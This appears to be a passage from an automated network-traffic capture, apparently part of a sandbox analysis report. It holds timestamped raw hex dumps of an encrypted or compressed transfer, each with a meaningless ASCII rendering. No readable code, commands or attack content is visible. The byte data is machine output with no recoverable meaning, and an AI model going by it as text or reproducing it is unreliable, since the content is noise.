                                                                        2021-10-14 08:47:23 UTC50INData Raw: af 3e 5b 50 14 31 eb ee df 70 0c c0 9f 54 5e 89 3e 99 a6 72 e2 1e 2d 03 44 34 8f fb 91 64 84 cc 30 a2 e3 ca 50 21 cf f2 cd 8d 1b 1a 90 79 72 59 98 92 b3 53 64 26 73 55 e5 cd 73 ff 83 17 a5 7c 06 ac ce 2e 64 9d 2b 36 c6 3b 60 48 c3 74 13 2a 46 85 35 f0 a4 e7 73 9e f1 5a 60 3a 1a ff 6a f7 9a 0b a2 13 5b 90 7f 52 29 ed a2 cc a3 80 3a 22 32 4d 79 55 c3 ea ed c3 43 50 35 86 12 b2 e5 ee 7c 2f 87 86 3e 50 b0 70 a5 4e 6a 46 10 70 35 62 09 eb 20 0b ca 18 bb b0 00 fc 8b d9 58 d6 8b 06 a0 ea 9b ec 29 1e 75 5d 6d d2 76 16 44 37 0c 91 2e 69 fb b6 a2 9a 59 90 e7 93 ca 14 44 fc f7 05 79 89 82 44 1e 0c 65 fc 21 45 2a 42 33 e4 a9 39 a2 ee e0 15 55 1a 02 07 ec 80 7f ab b9 a3 3e 0f 42 00 16 2d 8b cf b3 00 d1 96 08 4a 77 fb 63 95 03 7e 5a 3e de 8e cf 22 42 bc f2 d6 3e 42 6e
                                                                        Data Ascii: >[P1pT^>r-D4d0P!yrYSd&sUs|.d+6;`Ht*F5sZ`:j[R):"2MyUCP5|/>PpNjFp5b X)u]mvD7.iYDyDe!E*B39U>B-Jwc~Z>"B>Bn
                                                                        2021-10-14 08:47:23 UTC51INData Raw: fa 85 3b d0 2d 74 a8 42 e7 6a 05 e7 4e 42 76 56 b5 1d fb e3 24 33 0f c2 98 2b 13 da 55 ef 91 e1 07 a3 3e 5d f8 ee d9 db 44 24 d0 03 bd 4a cd c4 00 9f d1 c6 8e c5 24 f8 1c e6 21 2a 41 5d 8f 1c 0f 61 16 4c cb d9 e3 76 d4 38 2c c6 cd ee e7 17 7f 38 a4 09 d4 9d 8a 8f 55 6d 48 67 f4 22 ee ae 84 ec c4 76 8e e8 1d 53 7d 20 84 ad 09 8b fc 0f f4 89 d5 46 b5 1a f9 29 b6 b5 a1 cb f4 6b b5 7b 12 6a e8 e3 70 be d3 04 51 71 35 a9 6e 3e b3 a1 da 75 2e 72 46 1e 5d ca 8b b5 48 47 a9 eb f9 23 8f 67 61 2d e0 92 5d 1b f4 aa df 88 fb c7 d8 cf 7c ca aa 64 60 38 94 8e e7 ed 35 3e 83 e3 0e 97 20 ec b2 df 58 87 ab b5 c8 fd 99 ec 65 51 6d 3a ea ee c6 0b 93 3f e6 b8 45 aa a4 4a 2f c9 ff 28 e3 16 1b 0f 89 1e 3f fd c3 19 23 e0 9f 68 e0 f2 3b e4 1e 70 04 c5 14 8b c1 86 4a 81 6e c2 ac
                                                                        Data Ascii: ;-tBjNBvV$3+U>]D$J$!*A]aLv8,8UmHg"vS} F)k{jpQq5n>u.rF]HG#ga-]|d`85> XeQm:?EJ/(?#h;pJn
                                                                        2021-10-14 08:47:23 UTC52INData Raw: a3 05 84 a5 d8 58 ca a2 11 a2 f4 9c e1 20 23 b5 5e 6d ce 5e 8d 45 2c 36 ba b2 29 fa bc b1 ef 48 94 de d1 70 14 4e db fa 7d 4e 54 20 4c 36 d4 77 f8 0f c7 45 7f 39 f7 ab 05 ad c0 2a cb 4a 1d 2a cd 33 94 50 ab 45 a2 3e 0f 3e c8 11 26 a9 e4 b5 09 f3 d7 01 4b 7d d3 0b ab 03 78 43 11 17 8a e2 23 53 d8 12 bf 3c 48 62 22 71 c5 d4 2f 6b 78 b2 f0 9e 5f c6 04 63 be 78 b8 09 d1 42 2f 78 a4 83 e1 f7 10 6a 52 bf 76 86 3d c7 98 a5 8b ca 1a 83 88 25 80 bb e0 62 97 c0 d4 57 76 eb 8f 2d 76 83 b2 1a cd 74 2b 7e a1 2e 69 3e ef 7b 1e 86 f1 52 ab 84 86 e7 44 4b 9e 83 60 3e 8f ca a8 03 da 6a 88 1d 54 35 0a f5 ad d7 7f ef 1b e8 4e 0a e0 59 c1 0b 60 0e fe 94 83 ed c3 2a 81 29 25 b8 b5 05 71 59 8a e1 5a ae 7b d5 7c 2b 85 a6 f9 7c 90 16 1f 61 58 82 94 71 e7 05 b2 ec a7 32 9c a0 21
                                                                        Data Ascii: X #^m^E,6)HpN}NT L6wE9*J*3PE>>&K}xC#S<Hb"q/kx_cxB/xjRv=%bWv-vt+~.i>{RDK`>jT5NY`*)%qYZ{|+|aXq2!
                                                                        2021-10-14 08:47:23 UTC54INData Raw: ca 81 99 63 56 af fb ef 3b 60 64 60 2a f5 84 1b 5f f5 bb c3 8c 64 d7 c1 cc 7c cc bf 63 4d 61 6b 8f c1 fe b9 1c 9e f1 0b 91 19 75 ad d5 ac e9 a1 bf c1 e1 64 d2 6b 5f 56 d3 e9 ff c5 7e f0 3e ca bd 7f 8d da 85 3e cc dd d3 3a 05 19 17 84 25 7e fc d2 16 23 84 b6 af e0 ea 2e f4 08 49 45 df ea 80 fb 19 0e ba 70 d1 af d5 00 c0 79 0d f4 35 87 26 6b 2a fc d1 31 3c 89 cf e6 6b ce 10 8f 8a 62 64 23 23 e3 5d 14 67 14 87 d9 98 88 c6 ed 8e b3 09 00 a7 4e 13 4a c6 e6 5d 90 ea d8 95 54 4b 3d 46 55 2c 28 bc 90 cb 39 60 72 20 19 75 d9 bb 4d af c6 9a d7 43 57 40 af 25 3b ed 67 8b e1 e4 d3 05 0f f9 9f 50 7c 40 3e 9f 8a 5d 99 1d 2d 44 58 2c 8d f9 97 0b 42 9a 30 a8 3d 8e 74 09 f8 52 cc 87 17 24 a8 79 72 53 46 92 b5 2d 4f 27 73 57 cd da 71 3c 84 3f f4 b6 07 aa e6 22 66 9d 2d 43
                                                                        Data Ascii: cV;`d`*_d|cMakudk_V~>>:%~#.IEpy5&k*1<kbd##]gNJ]TK=FU,(9`r uMCW@%;gP|@>]-DX,B0=tR$yrSF-O'sWq<?"f-C
                                                                        2021-10-14 08:47:23 UTC55INData Raw: db cf 40 58 96 aa 2f 7c 94 ab 11 04 65 2b 69 dc 83 79 c0 e4 23 11 97 fa 5e 49 cd 87 e7 4f 4b 9a 83 69 00 4b f4 35 14 ba b7 c0 1c 5e 4b 0b ff b2 de 7f fa 0a ff 74 c9 e8 a7 c6 48 d9 1e f0 8f fa 65 d0 2d 85 36 3e b8 bd 05 6b cc c3 f7 ac 8c 03 46 7c 00 9e b2 ee 68 ab e4 1f 70 4c 8e 8a fc c4 2b a3 fb b8 57 44 aa 30 47 23 c4 d5 5f fe 87 ad 5b a1 2c af 96 66 0d 02 9e fe 52 e6 30 f3 f9 be 6d b5 ac 85 86 7d 53 67 ff 53 a3 c7 06 36 74 c1 6f 44 d6 cb b7 ae 23 da b0 6f 82 42 9b b7 9c 53 43 9e 67 de d3 99 c0 93 e3 7d d4 48 ad e7 f9 61 6c 29 0c 37 7a 3f ca f0 9c 0c c9 2e 73 d6 74 f9 94 02 da 4e 2d e1 39 93 15 e8 e0 28 2a 35 12 8a 39 0c 4b 7e c1 98 94 bb b2 34 38 e5 f5 ca c3 55 3b ad db 9c b4 c6 d2 a1 70 26 31 3f fb 37 f6 6f c2 03 39 52 71 92 1f 1e 0d d3 4d e7 d1 b4 a7
                                                                        Data Ascii: @X/|e+iy#^IOKiK5^KtHe-6>kF|hpL+WD0G#_[,fR0m}SgS6toD#oBSCg}Hal)7z?.stN-9(*59K~48U;p&1?7o9RqM
                                                                        2021-10-14 08:47:23 UTC56INData Raw: ce 54 95 85 89 fa b7 40 e1 5d 4b c5 fc f0 b4 c2 20 7a 6a be 34 5c b2 4e a3 40 82 e0 3b 6b 60 4a b7 f5 47 05 14 31 eb e8 c8 05 36 d1 05 78 7c 9a 3c 9f cf a6 b3 1d 27 14 67 3d 9d ec 41 91 6a c7 34 a8 3b ab 89 09 f8 f8 92 ab 62 23 a3 68 62 c9 50 83 be 3c 5f bd 1c 98 cd da 7b e8 5f 50 1b 7f 06 a0 f5 32 77 96 3c 49 17 ed fa 54 0c 71 27 12 66 53 af 95 60 cf 4b 94 e9 8a d1 d5 1c d5 61 f8 9c 78 80 11 5d 96 70 61 38 e6 d7 05 a3 81 30 38 33 63 74 08 cb 8b df c1 43 57 3f a7 0a b4 6e c8 7e 2f ed 97 2f 50 c6 a5 83 4c 60 4a 7f f2 1d 6e 07 e7 58 f7 e0 1a b1 a5 03 93 b4 b7 4f d3 a3 1b b3 fa 8a 37 33 26 a4 4e 7c c3 60 90 bb c8 f9 a8 bb 7e 2d af b8 8f 41 85 dc 9c 69 e9 b1 2e 2e 16 57 7c 17 46 1e 06 67 ea 7a 6a 2a 42 33 fa 89 10 aa c6 2b c8 57 1a 00 c4 c7 80 34 9f 72 a2 3e
                                                                        Data Ascii: T@]K zj4\N@;k`JG16x|<'g=Aj4;b#hbP<_{_P2w<ITq'fS`Kax]pa8083ctCW?n~//PL`JnXO73&N|`~-Ai..W|Fgzj*B3+W4r>
                                                                        2021-10-14 08:47:23 UTC57INData Raw: cc 98 4b 94 6a 76 a0 dc 62 94 46 98 c1 ca 99 d7 82 f7 47 fa 6d 53 ec f8 66 19 82 04 58 67 35 17 27 83 2a da 2d 76 ef 3a e5 6a 05 fb 4d 7b 91 3a 93 19 d3 01 36 39 21 3a c6 2b 15 b3 6c e9 98 cf e7 b1 34 34 c7 08 da d1 53 02 e2 c4 bd 4c d4 f8 a4 49 c6 3a 50 d5 1d 1f 6a dd 27 02 1d 71 83 0b 12 1c 24 64 d7 dc 8c 27 fc 25 22 1a 15 d3 9f 3f 48 3e b7 04 ce b8 e7 31 55 6b 6a 73 d8 1a e8 86 d3 32 c6 76 a8 fe 3f 7b 53 22 c5 9f 1f a3 d0 0f f4 83 9a 68 e6 69 b8 2a b6 b3 0e c3 e5 62 b2 7f 3a 8f eb e3 76 af d5 2c 76 71 33 a3 01 16 7f a0 dc 64 f3 62 4e 71 6c c8 8b b3 43 4e b8 ed 85 35 88 67 66 3d e9 ba 13 1f f4 bd a6 b1 fc ff 2c c9 6d c3 c5 62 64 25 60 51 c4 cd 0b 03 9d f0 01 84 3b c1 95 d5 a6 8c 59 bd 1f f2 6a c9 4d 5a 7e 35 f9 f4 b0 ab 6d 3e c0 bc 7b 90 cb 83 25 17 f7
                                                                        Data Ascii: KjvbFGmSfXg5'*-v:jM{:69!:+l44SLI:Pj'q$d'%"?H>1Ukjs2v?{S"hi*b:v,vq3dbNqlCN5gf=,mbd%`Q;YjMZ~5m>{%
                                                                        2021-10-14 08:47:23 UTC59INData Raw: d2 45 87 f4 3a 24 b2 01 ed de 3e e3 92 2a 55 eb 69 a5 4e 6a 64 7f e3 35 68 10 e0 4f 9c e2 84 b1 a3 0f 9d b5 f0 b1 d3 a3 1b b3 ec 47 f6 fa 29 9a 4f 6a fc c2 8d 44 3d 19 a9 9a 80 fa bc bb 48 57 ad 92 78 d9 11 46 c0 f5 2b 98 55 20 4c 92 53 74 f8 08 f8 19 43 39 fd ad 39 ac d1 f7 05 53 0d 2c dc e4 be 4b 7c 8d 5d 36 2d b1 cc 17 27 8b 02 a7 21 ce 0a 08 40 55 fd 77 97 05 72 61 01 cf 89 e8 fb 44 b1 05 bf 3c 03 72 2a 1e 74 d5 2f 61 75 bb e3 90 33 d4 09 5b 06 79 b8 09 d2 4c 3e 75 24 90 e4 88 37 5a 55 b5 58 5e 3e c7 e0 b4 8e f3 3c 89 8a 39 f8 35 dc 62 9d d5 98 62 56 fb 99 42 74 93 b4 38 1d 71 03 e4 ce 9c 62 16 83 0e 0c 8c fc 3a e2 93 87 ed 5d 5e 84 94 72 3e 7c cd a8 03 a2 55 8e 1d 5e 40 0b fd bc c4 7a 96 6e ee 66 d2 41 48 cf 70 c6 27 37 9f f7 f5 d2 2c 8e 12 04 ae bd
                                                                        Data Ascii: E:$>*UiNjd5hOG)OjD=HWxF+U LStC99S,K|]6-'!@UwraD<r*t/au3[yL>u$7ZUX^><95bbVBt8qb:]^r>|U^@znfAHp'7,
                                                                        2021-10-14 08:47:23 UTC60INData Raw: 2c b6 b3 17 c3 dc 29 a7 7b 14 42 c6 e1 70 b8 fb e1 50 71 39 81 f2 3e 7d aa c9 73 f3 5b d1 1d 48 cc a3 9b 50 47 af c2 0f 12 8a 6d 48 b0 e0 92 39 08 f0 bd e1 6b fd ff 2c e7 52 c8 aa 73 4d c0 6b 8f c1 c0 bf 34 9d fa 18 90 37 c1 3a d6 a6 80 af 93 c3 e7 49 c9 9f 5b 7e 35 c2 63 c3 11 67 2d cf a6 55 80 e5 81 2f cf e3 17 17 05 1f 08 84 f3 3b ec d5 34 1a 1c 9e 42 f5 c2 06 e1 1e 6b 17 20 eb d5 c1 84 75 90 af 76 a9 c4 06 f9 92 26 da 31 e8 0a 7f 02 d4 d7 20 30 f0 f6 a7 18 e6 03 85 e3 b6 6c 32 21 f1 c1 e8 98 ed 36 e7 8b 82 b5 c7 86 a2 0e 43 8f 5d 19 39 ec ee 4c 95 ad 8d 94 54 47 8e 71 5f 3b f8 be 90 f2 72 75 7b a8 c1 60 a1 45 b4 57 09 87 9d 7c 61 40 a5 f1 7d 99 36 33 e1 e2 ca 07 36 c8 b7 07 74 9e 3a f6 88 58 b3 1b 3c 0c 7d 2b e2 df 95 0b 44 dd 39 b9 38 ec 77 08 f8 f4
                                                                        Data Ascii: ,){BpPq9>}s[HPGmH9k,RsMk47:I[~5cg-U/;4Bk uv&1 0l2!6C]9LTGq_;ru{`EW|a@}636t:X<}+D98w
                                                                        2021-10-14 08:47:23 UTC61INData Raw: b1 b8 09 ca 5b c0 77 61 bc d0 fa 0e 68 52 b3 4d 52 2f ca 96 db a6 e0 3e 85 99 22 86 d0 b2 46 95 ca c1 40 53 fe e1 0b 7e 92 b2 23 1a 5f 62 7c ce 9a 07 14 e7 0f 0a 80 e0 44 ab 85 86 e7 44 86 80 b7 4e 21 54 c9 a2 16 bb ab 33 1d 5e 4b 15 dd 95 cc 6c e2 d4 d7 77 c7 f4 8f d4 75 c3 1e ef 8c 79 48 fc f2 64 c5 d2 bb bb 03 af c4 3b e7 86 97 6d eb f7 fe 6b 5e 36 61 9d de 28 61 5e 9b 8e 0d b6 bd b2 ea be 35 a5 92 30 4d 31 24 9d a6 2b 71 98 43 b2 7f 9b 87 74 12 08 60 ff bb ef 08 1b 25 be 6d aa 05 97 94 7d 57 75 e0 41 47 c6 2a 2e 65 cb 79 de ac cb b3 ae a2 cd 98 41 5b 43 91 a1 c9 68 bc 61 82 c1 c0 8b c1 a3 f1 6f 36 6d 53 e6 51 6d 6a 29 12 4b 6b 06 1a fa 83 2a da 2d 75 de 98 e4 46 05 f4 57 57 68 2a 95 1f ea e3 2a 33 d9 13 b7 27 1c a4 7a d2 1e e7 01 b2 2b 39 fc e9 d9 c0
                                                                        Data Ascii: [wahRMR/>"F@S~#_b|DDN!T3^KlwuyHd;mk^6a(a^50M1$+qCt`%m}WuAG*.eyA[Chao6mSQmj)Kk*-uFWWh**3'z+9
                                                                        2021-10-14 08:47:23 UTC63INData Raw: 7a c9 e0 72 e4 c5 85 e5 a5 f8 32 2e c3 89 d3 04 fa 5e d4 a9 04 b3 d6 8e 2f 19 2b b7 7f c2 3f fd e6 c1 80 82 92 b5 c6 41 e1 57 c1 2a f9 b1 87 ab ad 60 7c b1 a7 6a 00 45 b2 50 84 9e f5 74 6a 60 16 2f 28 ea 88 20 e6 fb d2 2e c1 c1 9f 50 ea 8f 3b 86 ac 45 e0 81 3c 02 73 21 92 81 0b 1a 45 d3 3e 88 a8 c4 75 09 64 e3 ca 98 18 2d d4 e5 63 54 59 82 a3 b1 5e 20 6c 40 db 46 60 f8 9a 2d e2 e3 17 ad f9 24 70 01 3c 5e 1f 2f 76 de 0c 7d 29 17 67 19 24 fd b6 d9 6b 61 f1 50 be a6 0d d2 74 fc 8c 97 b3 14 42 88 75 ec 38 e4 a7 d5 83 01 3a 22 02 d1 74 1e dc fe e1 5f 52 56 31 ad 0d 2e 10 eb 63 33 fd 1a 2f 46 dc d7 85 ce 60 4c 6e 7f 24 65 1c f9 7e 18 ca 18 b1 3f 14 85 ba c7 4e 4e b2 16 bd ca bd 1e 20 36 b5 c2 7c d3 41 ac 52 ab 17 be ad 4b ed 20 a0 99 57 b7 d9 3e db 13 51 f5 d0
                                                                        Data Ascii: zr2.^/+?AW*`|jEPtj`/( .P;E<s!E>ud-cTY^ l@F`-$p<^/v})g$kaPtBu8:"t_RV1.c3/F`Ln$e~?NN 6|ARK W>Q
                                                                        2021-10-14 08:47:23 UTC64INData Raw: 08 6a 5d 6f f6 1f 65 c4 be 6d a0 8f c1 90 7d 44 1a 50 40 5d cc 88 3e 7c d3 07 e2 fe cb b9 86 7d c8 98 47 ed f2 90 a1 d6 ca ad 78 81 bf fc 8a d2 99 da 36 cf 6d 55 89 65 6c 6a 32 a6 49 74 32 c2 e9 92 3c c9 2c 4b 19 64 e5 6a 12 e7 55 43 e8 34 9a 26 37 e7 35 39 2e 7d 2a 2a 15 bf 6c fe 87 f4 13 8a 85 30 ef ef c8 c2 44 38 25 d7 b9 43 d6 fa c2 d1 2f 39 5a c0 30 85 08 dc 21 20 53 77 92 08 29 4e 29 4c cd b7 3e 20 d4 32 32 e4 12 ed 3c 3e 59 3d 8c 58 c3 90 ff 5a e7 6c 42 66 c8 e4 ef b8 70 33 d7 75 8c b3 33 53 7b 4f 77 98 09 81 ea f1 f5 9f 72 47 d5 0b 9f 00 eb b1 1d cc 9b d9 a2 7b 18 7e 16 e2 66 40 d2 64 40 74 1b f7 6a 3e 7b cf 68 74 fa 79 52 e0 49 dc 75 b4 32 18 90 fc e8 13 8a 14 42 2e e0 94 20 11 ee 36 dc 9b fe fe 39 d5 6d d0 bc 5d 3e 21 6a 89 69 f9 39 23 b5 ac 0f
                                                                        Data Ascii: j]oem}DP@]>|}Gx6mUelj2It2<,KdjUC4&759.}**l0D8%C/9Z0! Sw)N)L> 22<>Y=XZlBfp3u3S{OwrG{~f@d@tj>{htyRIu2B. 69m]>!ji9#
                                                                        2021-10-14 08:47:23 UTC65INData Raw: 43 98 56 be 3a 15 5b dc e3 14 bc 74 04 87 87 b5 fd 3c e3 b8 cd b0 85 33 ac b5 5b 54 32 d5 ed 79 74 54 8b 3d a8 08 b8 2a f5 6d 2b fa 8c 37 50 c9 50 8d 27 64 4c 68 cb 11 62 03 ed fc 89 c0 0f 67 b0 0f 93 af c9 46 e3 42 19 2c 5d 8b d0 17 20 a6 55 64 5a e9 9c 40 b9 b1 ae 68 7a e4 af bd b5 57 85 cb b3 c6 1c 5f da 6a 2b 18 50 20 40 36 28 74 f8 03 72 3b 49 2e 21 b2 23 bb ca 36 c0 46 10 3b c1 fc 9f 44 58 01 4d 3f 05 27 df 1e 3c 85 cf 94 1f ea 2a 30 f8 78 d3 75 86 22 69 69 a3 dc 9c f3 30 5d a0 36 cc cc 43 6e 20 0d 65 c4 3e 75 5d 3a e1 90 4f c3 84 5c 7c 78 b9 1d d4 58 16 d6 3e 90 ee a1 76 6a 52 bf d2 60 3e c7 9f a7 9c f3 2c 94 04 10 97 d4 dc 4a 2f ca c7 5b 76 a3 8e 2d 76 85 62 bf 3c 77 2b 79 dd 92 7e 2d e8 19 1f 95 d9 67 c6 92 81 f4 41 4e 86 86 15 34 56 c9 ae 16 a5
                                                                        Data Ascii: CV:[t<3[T2ytT=*m+7PP'dLhbgFB,] UdZ@hzW_j+P @6(tr;I.!#6F;DXM?'<*0xu"ii0]6Cn e>u]:O\|xX>vjR`>,J/[v-vb<w+y~-gAN4V
                                                                        2021-10-14 08:47:23 UTC66INData Raw: b3 50 12 a3 f0 40 71 51 a0 07 47 ee 14 37 8e fd d8 0e 2d f8 5b 50 76 9e 2d 8f bf 53 65 0e 3a 14 78 3a be aa 86 1d 5a 1a 23 bf 16 8d 64 19 eb d5 dc a0 06 15 c7 5e 70 53 40 83 bb 3a c2 20 73 51 cc c9 53 ee a7 29 e5 68 8a 95 e6 37 67 3f 3c 7b 14 13 cb 42 1d 70 1e 58 71 85 3f d2 43 ce 4b 94 d9 84 bf 3a 16 fd 4f eb 9a 01 cd 3b 5f 90 65 61 3e f4 6e df b4 90 34 35 8f 4a 65 19 c2 f7 d1 d2 65 47 3f a1 97 8d 01 ec 7d 8d fa a0 2a 69 68 ca a5 44 7f 6c e2 dc 35 62 02 f1 76 2b ca 18 bb 8f 2a 93 ab cf d5 d5 a3 11 a3 f9 be f0 03 20 a4 49 e1 eb 5e 8d 45 95 17 9a a6 41 50 bc b1 94 57 eb 43 9d ca 14 4f c7 d8 f1 73 54 2a 7c 42 f3 8b 07 1e c3 39 53 2e e4 b7 10 2f c4 21 16 44 13 02 83 e9 80 73 ec 6b a3 3e 0f 00 dd 06 22 a9 8c b1 09 ff 65 11 4b 7d d9 4c 53 03 78 49 28 d9 96 eb
                                                                        Data Ascii: P@qQG7-[Pv-Se:x:Z#d^pS@: sQS)h7g?<{BpXq?CK:O;_ea>n45JeeG?}*ihDl5bv+* I^EAPWCOsT*|B9S./!Dsk>"eK}LSxI(
                                                                        2021-10-14 08:47:23 UTC67INData Raw: 7e 66 30 12 49 61 28 c2 74 34 02 c2 3d 73 cd 6e f3 7b 0f fe ca e4 7a b7 24 37 e3 e4 35 33 33 1e 8a 27 19 a1 6c e1 98 69 b6 ba ba 85 df 2b d0 5f e2 3d 65 d3 6b c7 f8 fe ad 60 3d 3c 47 da bb 41 7e 07 32 3b 53 7c a8 15 10 11 3c 41 dc 02 85 30 d9 ac 2e 0b 1e ec 18 ab 29 a6 b5 0e d0 46 ea 38 44 60 53 7d ed f8 ff ab 00 85 d1 aa b3 39 ba 6c 7d 20 c4 8a 0f 9d ef 0a 7a 3e 94 9c a6 08 89 26 9d e7 0c cf e5 65 37 6a 16 7b e6 77 aa a8 fc 1c 40 77 22 a7 7f 3b 6c ae 4e 55 05 73 46 1e 9e db 8f a4 5c d3 73 74 c1 03 9b 61 71 22 f1 97 22 15 60 aa cd 8a f0 6b f0 51 7a db ac 64 6b b1 42 65 ca e8 29 1c 49 f1 0b 9d 19 cd ad d5 ac 8c 96 b3 d6 31 5c ef 6b 54 6f 2d db 57 1d 1e 48 16 fd b7 53 a2 d8 8c 07 f1 f5 3f 33 db 1f 04 b8 0d 7b e1 d2 1c 34 1e 9e 44 e5 ea 28 e1 0e 63 01 de fc
                                                                        Data Ascii: ~f0Ia(t4=sn{z$7533'li+_=ek`=<GA~2;S|<A0.)F8D`S}9l} z>&e7j{w@w";lNUsF\staq""`kQzdkBe)I1\kTo-WHS?3{4D(c
                                                                        2021-10-14 08:47:23 UTC68INData Raw: 73 0b ee d0 2f b4 7f b1 a3 01 0c 12 0e 5a 5c 14 39 ba eb 9d eb 31 30 a4 56 02 f6 5f 8d 4e 24 02 ca 94 68 fb b6 a2 97 59 9d d8 cd e3 15 4e db e1 0a 65 3b 0a 47 1e 06 6b e0 84 fb 2a 42 38 e4 ab 36 27 ed 21 16 54 0f 2f c4 fc 8a 7c 0d c5 8a 1e 04 2d c6 06 29 97 cd bf 00 77 bd 16 62 65 d2 75 9d 12 7c 57 28 ca 9f fc 0d 5c b6 2f b5 2d 4b 7f 20 71 53 d4 2f 6b 64 b2 f2 95 26 fd 08 5b 76 69 b1 66 eb 4d 3e 7f 35 97 e7 9f 2f e4 e5 da 72 5e 3e cd 8d b3 a6 f0 3f 83 82 3e 90 bb cb 63 97 c0 cb 59 54 27 9b 08 54 a5 b4 32 1d 64 20 50 e0 9e 68 38 ef 27 34 86 f1 43 1a 92 81 cd 4e 58 d4 8e 66 16 54 c9 a8 05 b5 d8 89 1d 69 40 18 f5 9a cd 6c e8 1f ee 66 d6 f9 59 c7 65 c9 3f f8 9e 96 ff c3 2a 0a 3a 2d bb ce 75 78 d7 37 fb 89 e9 88 d4 7c 0a 87 a7 ea 5c de f7 1f 6b 4d 94 8c 04 d4
                                                                        Data Ascii: s/Z\910V_N$hYNe;Gk*B86'!T/|-)wbeu|W(\/-K qS/kd&[vifM>5/r^>?>cYT'T2d Ph8'4CNXfTi@lfYe?*:-ux7|\kM
                                                                        2021-10-14 08:47:23 UTC70INData Raw: a0 c8 6f fa 73 47 05 78 c2 8b 97 57 47 a9 7f ea 13 9b 14 da 2c e0 98 39 68 0f ba c9 91 f2 f7 02 b2 78 ca ac 5d 1b 21 6a 89 e3 7f 20 34 9b 83 f7 96 31 e3 c2 28 a7 86 8d b5 e9 98 4b e1 7c 72 fe 3b ea f9 eb 86 6e 3e cc c4 af a9 cb 89 40 34 f4 3f 33 0d 37 7f 96 0d 3c d5 53 18 34 18 b6 d3 e0 ea 2e 92 e2 60 01 d4 85 77 ec 83 6b 94 5a ae ad c4 00 c0 16 0a f4 35 c0 9b 6a 2a fc a4 dc 3b e6 d2 88 96 c5 01 8f ed 8d e7 27 29 df be 6e 9c eb 5f e7 1e 81 b3 d0 fd 4f 09 2c a1 30 e4 3e fd ec 55 b9 06 8b 95 52 69 65 53 5d 3d d6 2a 9c da 37 02 87 af ae 40 cc b8 b3 50 12 87 da ed 64 40 a9 07 ac ee 14 37 c9 63 dd 0e 21 b2 63 51 76 94 53 64 a1 5a b9 15 05 8d 68 2c 8b d3 1e 0f 42 ca 18 3f 3e c4 73 7a 04 f3 cd 8d 78 cf a9 79 78 45 4e fd 4b 2c 4f 2d 64 8b de c8 62 fb bd 18 f5 7f
                                                                        Data Ascii: osGxWG,9hx]!j 41(K|r;n>@4?37<S4.`wkZ5j*;')n_O,0>URieS]=*7@Pd@7c!cQvSdZh,B?>szxyxENK,O-db
                                                                        2021-10-14 08:47:23 UTC71INData Raw: 92 9c 3e 82 5a 6a 5d 2a 34 38 ae 4f f3 99 fb 6f 98 a5 38 06 64 15 26 30 63 97 38 cf 0f 0c 87 e1 49 c4 92 87 d2 4f 96 96 90 6a 0c 54 c9 a9 16 85 de 89 32 5c 41 18 63 ad cc 7d fe 19 e6 5e c3 e1 59 c7 64 c3 07 e1 90 09 fe ef 2d 8c 29 2b b5 b2 07 71 d7 2c fe 9f 90 83 d4 50 0d 9c a8 fc 1b bc f4 1f 6b 54 8e 8a 11 cd 07 a3 e2 a3 c6 8c 86 33 55 28 f2 9f b1 09 67 a7 bd b3 12 a4 8f 6c 7d 21 61 ff 74 f0 1e 08 f0 be 7c a2 bc 68 95 51 4b 64 e7 59 42 ad b6 33 76 c3 79 cf f6 d4 b9 50 24 e0 91 50 85 5f 8c 3d c3 63 af 69 98 d0 c8 93 2c 92 de 66 da 6a 45 f9 c2 f1 70 2b 0c 58 7c 36 d5 f7 7d 2b f6 30 6d 4a 4d e5 6a 02 e5 40 4c 7c 2a 9b 1f ea ed 2a 32 d9 13 b7 2c 04 b2 72 f2 9d f4 09 b2 25 3a f0 e3 27 d0 79 38 bd 4a 0a 5d 1d e9 7b ec 05 39 50 d2 26 f3 76 d0 32 22 40 60 8b 11
                                                                        Data Ascii: >Zj]*48Oo8d&0c8IOjT2\Ac}^Yd-)+q,PkT3U(gl}!at|hQKdYB3vyP$P_=ci,fjEp+X|6}+0mJMj@L|**2,r%:'y8J]{9P&v2"@`
                                                                        2021-10-14 08:47:23 UTC72INData Raw: 29 09 2c ab 58 6a b2 fc e6 5b 82 81 9e 91 7c 15 e5 57 5b 54 79 ae 98 dc 1c 76 7d a3 73 37 a2 45 b2 46 09 8b 9d e3 61 40 a9 38 f2 f9 1b 22 e4 dc 95 0f 27 c1 8e 54 67 9b 2a f6 29 5b b3 1b 3e 03 44 6b 8c fb 9d 1a 46 dd 35 bf 52 4d 74 09 fe 9d 55 87 17 38 bb 7e 7a 7b 58 91 b5 2b 5e 21 5b 76 cd da 7b d7 aa 3f f4 75 3f 56 e6 37 66 8c 2a 71 07 3b 60 69 0e 72 27 0a 48 69 35 fa a9 de 43 8a d9 c8 ba 3a 1a c3 e6 ec 9a 0b a3 07 49 84 4b d3 29 e3 b2 d8 8b 5b 39 22 04 5b e8 1e c3 e4 f6 d7 57 45 06 15 1b b2 0b c4 e0 2f eb 8c 2f 45 eb c4 a4 4e 66 5f 67 f2 3d 76 2b 7f 5a 98 cc 0e 3c a4 05 82 a4 cc 4c c6 8b b2 a2 ea 97 f5 08 ec b6 5e 6b c2 d3 8a 44 37 07 ad a6 7d d3 1f b1 9e 42 bc 53 a2 ca 1e 5d da e1 0b 66 7c b8 42 1e 0a 62 75 0e d0 2a 43 2d e3 b5 00 09 c6 21 1c 41 34 fc
                                                                        Data Ascii: ),Xj[|W[Tyv}s7EFa@8"'Tg*)[>DkF5RMtU8~z{X+^![v{?u?V7f*q;`ir'Hi5C:IK)[9"[WE//ENf_g=v+Z<L^kD7}BS]f|Bbu*C-!A4
                                                                        2021-10-14 08:47:23 UTC73INData Raw: ba e5 cf f0 d4 a2 8e fb cc 98 41 1e 53 9f be ce 77 c2 fd 89 cf df 99 cd c8 6e 7e c5 72 47 f9 b7 f1 7b 36 1b 4d 72 06 56 eb 8d 35 cc 1c a6 c7 66 e5 f6 12 f8 5b 44 52 c2 93 1f fb 79 24 37 38 0a bb f0 15 b5 7f 71 80 e9 1e ab 2b 56 73 fe d7 ce 4f 0a 19 c4 bd 4a 5b ef a3 7e 35 26 1b 4f 24 f8 76 c1 01 f9 40 71 83 91 10 1a 32 51 d4 82 10 30 da 27 38 01 8f ea cc 20 57 27 f7 9f d6 9e f4 2a 45 e0 69 6c dc 1b fd a0 9f 3c d0 50 3c ef 37 53 e1 31 cb 8e 16 84 62 1e fa 91 93 2e 29 0b 94 31 96 7b 1d ca f4 f7 b2 75 08 75 9f 7f 61 b0 c8 1b 12 ed 22 a7 72 21 31 3c cb 7b e7 6c 01 82 59 c4 95 95 ab 47 a9 ea 76 02 84 78 69 0c 09 92 